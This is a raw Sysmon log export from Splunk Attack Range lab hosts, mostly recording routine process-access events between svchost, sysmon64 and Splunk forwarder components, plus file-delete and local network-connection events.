10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214413Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214412Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214411Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214410Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214409Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214408Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214407Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214406Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214405Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0E7D-6216-0004-000000003902}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214404Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.312{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E7D-6216-0004-000000003902}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:49.313{4F8D34B0-0E7D-6216-0004-000000003902}880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:50.950{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60AF3EFC91C75490F1E8A0E884CD08B1,SHA256=76A151640F94A891D07B133F20931520679912055C530DB6D227E9C0EC959BE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.517{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51187-false10.0.1.12-8000- 23542300x8000000000000000214433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:50.687{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=786C6D2D10EE05EE8BE6F25CD6B5B072,SHA256=6C5CA3668745BE7051F88672FFAFB2487C0F776E67822F85876E2E1B50F72C7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:50.439{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5800ABEA26A7079BCE9EF0AC4FC655CF,SHA256=D0D5837C499CD635320FDF6662BD5DDFB1C3F1C98474D666E113F4EA492171DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214431Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:50.203{4F8D34B0-0E7D-6216-0104-000000003902}10802280C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:51.951{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEA3ED23BEF299904CDD8DC4259450EE,SHA256=8A856E82E5F5DCD499523E3F1856145EB7DE2BDCD4C342AF132275DE037C01C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.765{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B217D972B724B4D1E5E75DB8A1A5A07,SHA256=B84CE0751ED27BB8E51C819F884236CCF9990ACDC4424B2BFBA5D43EF26FFBDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:48.567{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000214447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E7F-6216-0204-000000003902}1156C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:51.609{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 